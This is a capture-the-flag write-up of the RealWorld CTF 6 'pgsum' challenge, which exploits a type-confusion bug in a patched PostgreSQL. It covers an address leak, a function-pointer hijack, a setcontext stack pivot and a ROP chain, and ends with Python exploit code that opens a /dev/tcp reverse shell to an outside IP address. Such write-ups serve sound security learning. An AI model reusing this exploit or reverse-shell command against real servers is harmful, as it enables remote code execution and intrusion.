Recently, I participated in RealWorld CTF 6 playing with justcatthefish, successfully teaming up with a team member - embedded - to solve the pgsum challenge, centered around exploiting PostgreSQL. This experience provided valuable insights into navigating real-world cybersecurity tasks and highlighted the intricacies of exploiting PostgreSQL.
Description
We have added sum support for string to postgresql! Try it out!
1
2
3
4
SELECTsum(points)FROMrwctf;
Login the database with user ctf, password 123qwe!@#QWE.
After checking them we see that author wants us to pwn postgres 12.17 that was extended by custom functionality. Connecting to the remote gives us a possibility to run arbitrary SQL query, but we cannot create/modify anything.
Unfortunately code changes weren’t provided, so we need to figure them out ourselves. That’s easy - just compile postgres using Dockerfile that author provided and do a binary diff:
There were only two functions added - char_sum and varchar_sum.
These functions are similar but… different. They simply sum values after attempting to convert them to doubles. Varchar one uses pg_detoast_datum and text_to_cstring functions. A bit of googling tells us that these functions are related to toasted data. More information can be found in the postgres docs. So…
Where is a bug?
It turns out that varchar_sum is used to sum values of types different from just varchar. char_sum function is not that interesting. We can lookup postgres functions using pg_proc table:
We observe that sum functions related to types such as bpchar, text, and bytea also utilize the varchar_sum implementation. A quick look in the documentation reveals that bpchar is not a toastable type, so using varchar_sum for it is likely a bad idea…
Setting a breakpoint at the beginning of varchar_sum confirm the thesis (it is important to attach to pid that query SELECT pg_backend_pid(); returns). Let’s examine what is being passed to pg_detoast_datum after executing the following query: select bpchar_sum('1', 'AABBCCDD');
Cool! We have control over first argument of pg_detoast_datum function. Here is the source of it:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
structvarlena{charvl_len_[4];/* Do not touch this field directly! */charvl_dat[FLEXIBLE_ARRAY_MEMBER];/* Data content is here */};structvarlena*pg_detoast_datum(structvarlena*datum){if(VARATT_IS_EXTENDED(datum))returnheap_tuple_untoast_attr(datum);elsereturndatum;}
varlena is a struct used for representing toastable types. bpchar is not, so clearly this is a problem here. Now is the time for…
Exploitation
At this point there is no doubt that we can do something with fake varlena struct, but we don’t know any memory addresses that postgres is using. Turns out that this was simpler than we thought. It is enough to crash postgres to get a nice stack trace:
Good news is that connection wasn’t closed, so when we execute next query the addresses will stay the same. ASLR leak? Done. Now is the harder part - memory write.
Diving into a new, extensive codebase is no easy task. Our focus shifted towards functions related to varlena. It is even worse, a lot of complicated C macros are on our way. However, we encountered the complexity of numerous C macros. Undeterred, we delved into pg_detoast_datum and its callable functions. Among them, heap_tuple_untoast_attr emerged as an initial candidate, appearing to parse our data and return freshly allocated memory filled with parsed data. We analyzed almost every branch that was doing memory allocation - nothing fancy. However, one branch caught our attention, it calls another parse function on our data - heap_tuple_fetch_attr. It has very interesting branch inside:
1
2
3
4
5
6
7
8
9
10
11
12
13
elseif(VARATT_IS_EXTERNAL_EXPANDED(attr)){/*
* This is an expanded-object pointer --- get flat format
*/ExpandedObjectHeader*eoh;Sizeresultsize;eoh=DatumGetEOHP(PointerGetDatum(attr));resultsize=EOH_get_flat_size(eoh);result=(structvarlena*)palloc(resultsize);EOH_flatten_into(eoh,(void*)result,resultsize);}
Considering the code above - we are able to fully control ptr variable in DatumGetEOHP function, so effectively we have a control over get_flat_size function pointer that is called just after DatumGetEOHP, leading to arbitrary function call.
In order to call EOH_get_flat_size we have to construct our payload in the following way:
the first byte of our payload needs to be set to 0x01 - this is to satisfy VARATT_IS_EXTERNAL_EXPANDED macro in heap_tuple_untoast_attr function
the second byte has to be 0x02 to pass VARATT_IS_EXTERNAL_EXPANDED check and call DatumGetEOHP
the next six bytes should represent the address that will be copied to the ptr variable. The trick is that we cannot use null bytes in our payload, so we have to rely on the fact that upper two bytes of pointer will be zeroed (which may not always be the case)
Quick look on EOH_get_flat_size assembly:
1
2
3
4
pwndbg> disassemble EOH_get_flat_size
Dump of assembler code for function EOH_get_flat_size:
0x0000556a61659620 <+0>: mov rax,QWORD PTR [rdi+0x8]
0x0000556a61659624 <+4>: jmp QWORD PTR [rax]
The rdi is the part that we control. To achieve code execution, we need to ensure that the address at rdi+8, after dereferencing, points to a valid function address. Unfortunately we don’t have information about the heap address, so we cannot craft anything on heap. Fortunately, we are able to create and send a huge query string. postgres will use malloc to allocate memory for our string, so if it would be big enough malloc will use mmap for creating a memory chunk, and it will be located at known offset from libc (we know its address!). We can verify that using the following python code:
We have our offset now, and we can easily calculate address where our “fake” structure will be stored. Crafting it is the next step.
In the initial attempt, we tried to call system with /bin/sh. The following code was used (extended python script used before):
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
defprobe():conn.commit();cur=conn.cursor()fake_struct=flat(b'/bin/sh\x00',p64(rdi+0x10),# point to address belowp64(libc_base+SYSTEM))cur.execute(flat(b"SELECT '\\x",b'aaaaaaaa'*0x80000,fake_struct.hex().encode(),b"'::bytea, bpchar_sum('1', '",payload.strip(b'\x00'),# no null bytes allowedb"')"))
rdi has wrong MSB - it happens sometimes. To avoid such problem it is enough to just run some random SQL queries before executing our payload. Having that fixed we can do a quick check in gdb:
Cool, but that approach unfortunately will not work - shell is spawned inside main postgres process, and we cannot interact with it. Also eight bytes is not enough to store /readflag\x00 for system. The conclusion is that we need to pop a reverse shell, but we have only one function to call. We were looking for some nice gadgets that will allow us to do a stack pivot and craft a simple ROP chain in our big chunk of memory. We had a hard time finding a good gadget, so we decided to go with setcontext libc function.
As you can see it has a lot of nice assembly instructions, we can set the rsp with value from [rdx+0xa0]. Good news is that rdx is taken from rdi, which points to memory that we control. A bit of shenanigans and we end up with final payload:
SETCONTEXT=0x40ef0SYSTEM=0x4c3a0POP_RDI=0x0000000000027765# : pop rdi ; retdefexploit():conn.commit();cur=conn.cursor()cur.execute(b"SELECT repeat('1s0', 1000)")# fix rdi MSBfake_struct=flat(b'whatever',p64(rdi+0x10),# point to address belowp64(libc_base+SETCONTEXT),b'/bin/bash -c "/bin/sh -i >& /dev/tcp/143.42.7.235/4444 0>&1" \x00',# padded to 8B)forvinrange(1+8,0x1d):ifv==0x13:# rcx# special case - point it to ret# it is being pushed on stack later, so we dont want to break our ROPfake_struct+=p64(libc_base+POP_RDI+1)continue# create values that will be picked by [rdx+X] operations# 0x10000 is to move our new rsp a bit further so `system` function stack is able to growfake_struct+=p64(rdi+0x70+0x88+0x10000)# add paddingfor_inrange(0x10000//8):fake_struct+=p64(0xDD)# ROPfake_struct+=flat(p64(libc_base+POP_RDI+1),# ret to align the stackp64(libc_base+POP_RDI),p64(rdi+0x18),# reverse shell cmdp64(libc_base+SYSTEM),)cur.execute(flat(b"SELECT '\\x",b'deadbeef',# add 4B padding to align the rest of payload to 8Bfake_struct.hex().encode(),b'aaaaaaaa'*0x400000,b"'::bytea, bpchar_sum('1', '",payload.strip(b'\x00'),# no null bytes allowedb"')"))